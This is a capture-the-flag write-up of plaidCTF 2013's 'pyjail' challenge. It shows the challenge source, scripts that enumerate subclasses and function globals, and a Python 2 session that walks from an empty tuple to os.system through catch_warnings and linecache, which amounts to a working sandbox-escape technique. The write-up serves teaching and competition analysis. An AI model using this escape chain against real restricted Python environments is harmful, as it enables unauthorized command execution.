plaidCTF 2013 "pyjail" Writeup - Part I: Breaking the Sandbox

Mon 22 April 2013 by Javex

Note

This is part one of a two-part series describing how we broke the pyjail challenge at plaidCTF 2013. The second part is written by qll and covers the nonalpha stuff. This first part covers how to escape the sandbox.

The pyjail challenge was one of the toughest ones we Python guys had to do. When we first saw it, we thought it would be a walk in the park, since the author paid tribute to two of our Hack.lu 2012 challenges. Since one of the authors was available this weekend, we assumed it wouldn't be too hard to break. We were wrong. It took at least three of us several hours to come up with a solution.

In this article I will describe how we exploited the sandbox and how it probably was not what the author intended (based on the comments/hints we had). First of all, the source code:

Note

Update: We seem to have found the intended solution (see Ryan's comment below).

#!/usr/bin/python -u
'''
This challenge is a tribute to 'python jail' and 'The Sandboxed Terminal'
from Hack.lu 2012's CTF by Fluxfingers. Oh python, why you so why you so.

You should read some writeups on these (e.g. at ctftime.org/task/124/ and
ctftime.org/task/130/). You'll want to use a similar strategies to both
get past the character restrictions (e.g. `x`==repr(x) and True+True==2)
and to get past the sandboxing (e.g. the except handler below)
'''

from sys import modules
modules.clear()
del modules

_raw_input = raw_input
_eval = eval
ident = ''.join((chr(i) for i in xrange(256)))

#TIL: the interactive interpreter freaks if 'True' gets undefined,
#and 'None' is actually a keyword pretending to be a variable.
__builtins__.__dict__.clear()
__builtins__ = None

print 'Get a shell. The flag is NOT in ./key, ./flag, etc.'

while 1:
  try:
    inp = _raw_input()
    if not inp: continue
    inp = inp.split()[0][:1900]
    #Dick move: you also have to only use the characters that my solution did.
    inp = inp.translate(ident, '!"#$&*+-/0123456789;=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^abcdefghijklmnopqrstuvwxyz|')
    a = None
    exec 'a=' + _eval(inp, {}) in {}
    print 'Return Value:', a
  except ().__class__.__bases__[0].__subclasses__()[42].__subclasses__()[0], e: #42 is base exception.
    if e.__str__().startswith('EOF'): raise e
    else: print 'Exception:', e

Let's examine it piece by piece. First of all, all currently loaded modules are removed:

from sys import modules
modules.clear()
del modules

In the next step a backup of two required functions is made and all other functions are "removed" from the environment:

_raw_input = raw_input
_eval = eval
__builtins__.__dict__.clear()
__builtins__ = None
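
To see why clearing the builtins is not enough on its own, here is a minimal sketch. It is written for Python 3 and imitates the situation by handing eval an empty __builtins__ mapping, which is an assumption made for the demo and not the challenge code itself; EMPTY_ENV and try_eval are made-up names.

```python
# Sketch (Python 3): evaluate expressions with no builtins available.
# EMPTY_ENV and try_eval are illustrative names, not part of the challenge.
EMPTY_ENV = {"__builtins__": {}}


def try_eval(expression):
    """Return ('ok', value) on success or ('error', exception class name)."""
    try:
        return ("ok", eval(expression, dict(EMPTY_ENV)))
    except Exception as exc:
        return ("error", type(exc).__name__)


# Plain names such as open or __import__ can no longer be resolved...
name_lookup = try_eval("open")
import_lookup = try_eval("__import__('os')")

# ...but literals still carry their types, so the object tree stays reachable.
base_lookup = try_eval("().__class__.__base__")
```

Both name lookups fail with a NameError, while the attribute walk starting from the empty tuple still ends up at object.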

Note that I will not cover anything related to the nonalpha restriction, so for this part we will simply pretend that the character filter does not exist. The two parts are completely independent of each other, which makes the sandbox escape much easier to explain without it.

Those of you who are familiar with our earlier challenges (one of which was inspired by yet another challenge) might remember that you could easily open a file by walking the object tree. If you aren't, read the writeups on The Sandboxed Terminal and python jail. I will not cover the basics of this technique, to keep the article short.

But our goal is to get a shell, so merely opening a file would not get us there. We played around with ttys and other ideas for turning file access into command execution. We also examined every class that we could find via ().__class__.__base__.__subclasses__().

At this point you have to ask yourself: how would you get a shell from Python if you had no restrictions at all? There are several possibilities, but the simplest that comes to mind (for me) is os.system. However, we cannot use __import__ or reload because they were removed.

I am going to skip ahead here. The technique I am about to describe took us several tries and hours to develop, but the process in between was mostly poking at approaches that did not work, which is pretty boring.

One of the cooler ideas that didn't work was thinking at the bytecode level: functions that are implemented in Python (and not in C) have a __code__ attribute, which you could load and execute. In the end we didn't find anything worthwhile, which is partly because the globals this bytecode references are probably gone. We didn't pursue it any further, but maybe it would even have worked.
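
To illustrate the idea (this is a sketch, not code we ran against the challenge): a code object can be wrapped in a new function with a globals dict of our choosing. The example assumes types.FunctionType is importable, which it would not be inside the jail, and all function names are made up. It also shows the problem mentioned above: bytecode that refers to a global fails as soon as that global is missing.

```python
import types

GREETING = "hello"


def constant():
    return 42


def uses_global():
    return GREETING


def rebuild(func, new_globals):
    """Wrap func's code object in a fresh function that uses new_globals."""
    return types.FunctionType(func.__code__, new_globals)


# Functions written in Python expose their bytecode; C builtins do not.
python_has_code = hasattr(constant, "__code__")
builtin_has_code = hasattr(len, "__code__")

# Code that needs no globals runs fine with an empty globals dict.
result_constant = rebuild(constant, {})()

# Code that references a global breaks when that global is absent...
try:
    rebuild(uses_global, {})()
    missing_global_failed = False
except NameError:
    missing_global_failed = True

# ...and works again once we supply the name ourselves.
result_fixed = rebuild(uses_global, {"GREETING": "hi"})()
```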

Finally, we decided to search for all objects that we could get our hands on. We did this by walking the object tree, extracting every object we could reach and then printing them all. Looking through these objects might give a useful hint on where to go next.

For this, we needed a script that runs under almost the same restrictions as the challenge but keeps a few utility functions as backups so that our algorithm can work. Thus, the preparation in our script looks like this:

_set = set
_list = list
_str = repr
_hasattr = hasattr
from sys import modules
modules.clear()
del modules

__builtins__.__dict__.clear()
__builtins__ = None

Getting all we could find is a three-step process:

  1. Find all subclasses
  2. Inside all subclasses look for anything we might want
  3. Filter this list for something we need, e.g. os

Step one is very easy:

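def get_subs(c, seen=None):
    # Recursively collect every distinct subclass reachable from c.
    if seen is None:
        seen = _set()
    try:
        direct = c.__subclasses__()
    except:
        # type.__subclasses__() needs an argument; names like TypeError are gone
        return seen
    for sub in direct:
        if sub not in seen:
            seen.add(sub)
            get_subs(sub, seen)
    return seen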

You can call it with get_subs([].__class__.mro()[1]), where the argument is actually just <type 'object'>. We get back a set of distinct subclasses that were collected recursively.
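
The same collection can also be written without recursion. The following is a minimal sketch and not the script we used: all_subclasses is a made-up name, it assumes the builtins are still available, and it calls type.__subclasses__(cls) so that type itself (whose unbound __subclasses__ needs an argument) does not raise.

```python
def all_subclasses(root):
    """Return the set of all direct and indirect subclasses of root."""
    seen = set()
    stack = [root]
    while stack:
        cls = stack.pop()
        # Calling through type works for every class, including type itself.
        for sub in type.__subclasses__(cls):
            if sub not in seen:
                seen.add(sub)
                stack.append(sub)
    return seen


subclasses_of_object = all_subclasses(().__class__.__base__)
```

Since bool derives from int, finding it in the result confirms that indirect subclasses are picked up as well.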

Step two needs some explanation first: every function in Python has access to local and global variables, and possibly to closure variables as well. I will not go into detail here, but all global variables accessible to a function can be found in func.func_globals, which is a dict if such globals exist. Among those globals are the loaded modules that the function has access to. I have to admit that I do not know exactly how this works, because some of those globals were actually removed by our initialization above, but the result shows that this was not true for all of them. But don't worry, we don't need to understand it, we just need to try it:

def get_func_globals(c):
    subs = _list(get_subs(c))
    gs = _list()
    for sub in subs:
        if _hasattr(sub, '__dict__'):
            for k,v in sub.__dict__.items():
                if _hasattr(v, 'func_globals'):
                    if not _hasattr(v.func_globals, "keys"):
                        continue
                    for fk in v.func_globals.keys():
                        if v.func_globals[fk]:
                            print "%s is not None in %s -> %s" % (fk, k, sub.__name__)
                            if v.func_globals[fk] not in gs:
                                gs.append(v.func_globals[fk])
        if _hasattr(sub, 'func_globals'):
            if not _hasattr(sub.func_globals, "keys"):
                continue
            for fk in sub.func_globals.keys():
                if sub.func_globals[fk]:
                    print "%s is not None in %s" % (fk, sub.__name__)
                    if sub.func_globals[fk] not in gs:
                        gs.append(sub.func_globals[fk])
    print "Globals: %s" % gs
    return gs

get_func_globals is a very ugly function, but the principle is simple: for every class returned by get_subs, it looks through the class's attributes for anything that has func_globals, and from those it keeps the globals that actually hold a value. All of these globals are saved to a list and also printed so that we can look at them directly. This is the output for me:

Container is not None in __call__ -> Callable
MutableMapping is not None in __call__ -> Callable
KeysView is not None in __call__ -> Callable
Callable is not None in __call__ -> Callable
__all__ is not None in __call__ -> Callable
ValuesView is not None in __call__ -> Callable
Mapping is not None in __call__ -> Callable
ABCMeta is not None in __call__ -> Callable
__doc__ is not None in __call__ -> Callable
MappingView is not None in __call__ -> Callable
Hashable is not None in __call__ -> Callable
...
sys is not None in __init__ -> catch_warnings
linecache is not None in __init__ -> catch_warnings
...
formatwarning is not None in __init__ -> catch_warnings
_getaction is not None in __init__ -> catch_warnings
Globals: [<class '_abcoll.Container'>, ..., <function _getaction at 0x7f47c777acf8>]
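
For readers on a newer interpreter, the lookup behind this output can be sketched more compactly. This is an illustration under assumptions rather than our original script: it uses __globals__ (the Python 3 name for func_globals, also accepted by Python 2.6 and later), and Demo, demo_globals and live_globals are made-up names. The stand-in class gets a method with hand-made globals so that the result does not depend on what happens to be loaded.

```python
import os
import types


def _template(self):
    return None


# Hand-made globals for the demo: one module, one plain value, one None entry.
demo_globals = {"os": os, "answer": 42, "cleared": None}

# Demo is a stand-in class whose only method carries demo_globals.
Demo = type("Demo", (object,), {
    "method": types.FunctionType(_template.__code__, demo_globals),
})


def live_globals(cls):
    """Map 'attribute.global_name' to each truthy global reachable from cls."""
    found = {}
    for attr_name, attr in vars(cls).items():
        func_globals = getattr(attr, "__globals__", None)
        if not isinstance(func_globals, dict):
            continue
        for global_name, value in func_globals.items():
            if value:  # same filter as in the article: skip None entries
                found["%s.%s" % (attr_name, global_name)] = value
    return found


found = live_globals(Demo)
```

The entry for cleared is dropped, just like the globals that the script above skips because they are None.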

I have truncated the output because it can be very long. What you can see here is that we get a long list in which even something like sys is available. However, after looking carefully, we did not find a way to use sys, so we would rather have os, and we need to know how to get to it. So we do another iteration over all those global variables: we look in each of their __dict__ attributes for the os module:

def check_globs(globs):
    # Collect every attribute of the given globals whose repr mentions "os".
    ret = _list()
    for glob in globs:
        if not _hasattr(glob, '__dict__'):
            continue
        for k, v in glob.__dict__.items():
            if k in ['__doc__']:
                continue  # docstrings only produce noise
            if "os" in _str(v):
                print "%s: %s -> %s" % (glob, k, v)
                ret.append(v)
    return ret
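
A substring test on the repr is deliberately loose and also matches names such as 'posix'. As a hedged alternative, the search can match on type and module name instead. This is only a sketch: find_module_refs is a made-up helper, and fake_linecache is a hand-built stand-in module so that the example does not rely on the internals of any real module.

```python
import os
import types

# fake_linecache stands in for a module found among the collected globals.
fake_linecache = types.ModuleType("fake_linecache")
fake_linecache.os = os
fake_linecache.builtin_names = ("posix", "sys")  # repr contains "os" as well


def find_module_refs(candidates, wanted="os"):
    """Return (holder name, attribute name) pairs that point at the wanted module."""
    hits = []
    for holder in candidates:
        # Objects without a __dict__ are simply skipped.
        for key, value in getattr(holder, "__dict__", {}).items():
            if isinstance(value, types.ModuleType) and value.__name__ == wanted:
                hits.append((getattr(holder, "__name__", repr(holder)), key))
    return hits


hits = find_module_refs([fake_linecache, 42, "not a module"])
```

Only the os attribute is reported; the tuple that merely contains the string 'posix' is ignored.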

We pass in the list of globals from above and inspect the __dict__ attribute of each of them. This finally yields:

<module 'sys' (built-in)>: flags -> sys.flags(debug=0, py3k_warning=0, division_warning=0, division_new=0, inspect=0, interactive=0, optimize=0, dont_write_bytecode=0, no_user_site=0, no_site=0, ignore_environment=0, tabcheck=0, verbose=0, unicode=0, bytes_warning=0, hash_randomization=0)
<module 'sys' (built-in)>: builtin_module_names -> ('__builtin__', '__main__', '_ast', '_codecs', '_sre', '_symtable', '_warnings', '_weakref', 'errno', 'exceptions', 'gc', 'imp', 'marshal', 'posix', 'pwd', 'signal', 'sys', 'thread', 'xxsubtype', 'zipimport')
<module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>: os -> <module 'os' from '/usr/lib/python2.7/os.pyc'>

Only look at the last line: there is a module os in linecache? Okay, where did linecache come from? Looking at the output from above, we see that it can be found in the globals of catch_warnings.__init__ (it's actually in all of its functions). How do we get catch_warnings? Luckily, it is a direct descendant of object. Its index depends on the environment, but the pCTF guys were nice enough to provide some boxes to ssh into (for other challenges) that had the exact same environment, so finding the index was not a problem:

>>> ().__class__.__base__.__subclasses__()[49]
<class 'warnings.catch_warnings'>
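
Because the index differs between environments, it is easier to look it up by class name than to guess it. A minimal sketch, assuming you can run code on a machine with the same setup as the target; subclass_index is a made-up helper name.

```python
import warnings  # make sure the class exists before we search for it


def subclass_index(name):
    """Return the index of the first direct subclass of object with this name, or None."""
    for index, cls in enumerate(().__class__.__base__.__subclasses__()):
        if cls.__name__ == name:
            return index
    return None


index = subclass_index("catch_warnings")
```

The number this returns is only valid for the interpreter and set of loaded modules it was computed in.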

From here it is easy to build the rest:

>>> ().__class__.__base__.__subclasses__()[49]
<class 'warnings.catch_warnings'>
>>> ().__class__.__base__.__subclasses__()[49].__init__
<unbound method catch_warnings.__init__>
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals
{'filterwarnings': <function filterwarnings at 0x7f4da4c87a28>, ..., 'linecache': <module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>, ..., '_getaction': <function _getaction at 0x7f4da4c87cf8>}
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals["linecache"]
<module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals["linecache"].__dict__
{'updatecache': <function updatecache at 0x7f4da4c878c0>, ..., 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>, ...}
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals["linecache"].__dict__["os"]
<module 'os' from '/usr/lib/python2.7/os.pyc'>
>>> ().__class__.__base__.__subclasses__()[49].__init__.func_globals["linecache"].__dict__["os"].system
<built-in function system>
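
The session above is specific to Python 2.7. As a hedged sketch of the same idea on Python 3, where func_globals is called __globals__: the class used below, os._wrap_close, is an assumption about CPython's os module and has nothing to do with the challenge, and find_direct_subclass is a made-up helper. The function is only retrieved here, not called.

```python
import os  # ensures the os module, and with it os._wrap_close, is loaded


def find_direct_subclass(name):
    """Return the first direct subclass of object with this name, or None."""
    for cls in ().__class__.__base__.__subclasses__():
        if cls.__name__ == name:
            return cls
    return None


# Assumption: CPython 3 defines the helper class _wrap_close in os.py, so its
# __init__ is a Python function whose globals are the os module's namespace.
wrap_close = find_direct_subclass("_wrap_close")
os_namespace = wrap_close.__init__.__globals__
system_function = os_namespace["system"]
```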

Again, I have shortened the output of some of the longer results. However, you can see that in the end we have access to the system function. This was our first breakthrough: we could escape the sandbox. Encoded naively, this exploit came to more than 8000 characters, far above the 1900-character limit, so we had to work around this. How that worked is the second part of a cool story, and for that you should check out qll's writeup.

